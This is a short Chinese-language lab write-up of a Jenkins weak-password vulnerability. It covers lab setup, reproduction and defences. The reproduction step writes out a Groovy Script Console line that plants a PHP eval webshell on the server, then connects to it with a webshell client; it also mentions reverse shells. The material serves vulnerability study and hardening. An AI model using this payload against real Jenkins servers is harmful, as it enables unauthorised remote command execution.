jenkins弱口令漏洞
一、漏洞描述
通过暴力破解管理控制台,如果爆破成功,可获得后台管理权限。操作后台,后台可通过脚本命令行功能执行系统命令,如反弹shell等,低权限可以通过创建控制台输出方式执行命令。
二、漏洞环境搭建
1、 官方下载jenkins-2.50-1.1.noarch.rpm,下载地址: http://mirrors.jenkins.io
2、在redhat6.5上安装jenkins
2.1、使用rpm安装
rpm -ivh jenkins-2.50-1.1.noarch.rpm
2.2、启动服务
2.3、浏览器访问http://192.168.10.137:8080,如下图所示需要输入密码,密码文件在如下图位置
2.4查看密码文件,输入密码后进入如下界面,选择安装建议的插件
2.5、安装完插件之后,进入如下界面,设置用户名和密码
2.6、设置完用户和密码之后,进入如下界面,点击如下图位置,到此为止,jenkins环境搭建成功
三、漏洞复现
1、浏览器访问http://192.168.10.137:8080
2、猜解出密码,然后登录,点击”系统管理”
3、选择如下图所示
4、利用”脚本命令行”上传webshell,内容如下:
new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');
5、点击“运行”,没有报错,上传成功
6、菜刀连接
四、漏洞防御
1、增强后台密码强度
2、后台不对外开放
-------------------------------------------------------------------------------
参考链接:https://www.secpulse.com/archives/2166.html